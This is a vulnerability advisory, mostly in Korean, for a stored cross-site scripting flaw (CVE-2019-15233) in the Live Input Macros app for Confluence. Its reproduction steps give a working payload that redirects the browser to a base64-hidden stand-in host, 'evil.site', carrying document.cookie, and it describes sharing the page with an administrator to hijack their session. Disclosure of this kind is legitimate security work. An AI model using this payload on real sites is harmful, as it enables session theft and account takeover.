
(FAB-2019-00157) 제가 발견한 취약점 CVE-2019-15233
(FAB-2019-00157) 제가 발견한 취약점 CVE-2019-15233
권고: 권고
Advisory ID: FAB-2019-00157
Product: Live Input Macros
Manufacturer: Old Street Solutions
Affected Version(s): 2.10 and before
Tested Version(s): 2.10
Vulnerability Type: Cross-Site Scripting (CWE-79)
Risk Level: High
CVSS v3.0: 7.6
Vektor String: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H
Vendor Homepage: https://www.oldstreetsolutions.com/
Software Link: https://marketplace.atlassian.com/apps/1215287/live-input-macros
Solution Status: Reported
Manufacturer Notification: 2019-08-19
Solution Date: 2019-08-20
Public Disclosure: 2019-08-20
CVE Reference: CVE-2019-15233
Author of Advisory: Francesco Emanuel Bennici, FABMation GmbH
이 보안 취약점은 FABMation GmbH의 _Francesco Emanuel Bennici [email protected]_에 의해 발견되었습니다.
Live Input Macros는 사용자가 Confluence 페이지에 체크박스, 라디오 버튼, 드롭다운 목록 등을 추가하고 페이지를 편집하지 않고도 변경할 수 있게 해줍니다.
사용자가 악성 코드를 추가하면 공격자는 Confluence 사이트에서 JavaScript 코드를 실행할 수 있습니다.
이는 (예: 관리자의) 세션 쿠키를 탈취하는 데 사용될 수 있습니다 (세션 하이재킹).
다음 내용을 복사하세요:
Hello World this is my Text Box </p> </div>
alksdfjlkasdjflkj </p> " <br/> <style/onload=window.location=atob("aHR0cDovL2V2aWwuc2l0ZS8/PQ==")+document.cookie> <br/> " <p> asdasd
그리고 Confluence 페이지에 새 요소를 생성합니다. 이 텍스트를 붙여넣고 Confluence 페이지를 (예: 시스템 관리자와) 공유하세요. 관리자가 사이트에 접속하면 세션을 하이재킹/"복사"할 수 있습니다.